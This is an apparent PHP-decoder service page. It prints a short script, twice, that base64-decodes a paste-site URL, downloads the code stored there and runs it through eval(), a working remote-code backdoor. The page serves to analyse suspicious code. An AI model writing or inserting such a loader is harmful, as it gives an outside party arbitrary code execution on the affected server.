Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEA..
Decoded Output download
<?php
function get($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$ok = '?>';
eval("$ok" . get(base64_decode('aHR0cHM6Ly9wYXN0ZS5teWNvbmFuLm5ldC81MTU1NzctODU5ZGExMDkudHh0')));
?>
Did this file decode correctly?
Original Code
<?php
function get($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$ok = '?>';
eval("$ok" . get(base64_decode('aHR0cHM6Ly9wYXN0ZS5teWNvbmFuLm5ldC81MTU1NzctODU5ZGExMDkudHh0')));
?>
Function Calls
get | 1 |
curl_init | 1 |
base64_decode | 1 |
Stats
MD5 | c40ea0031cd18f2fc1eedbdf5bbd9167 |
Eval Count | 0 |
Decode Time | 67 ms |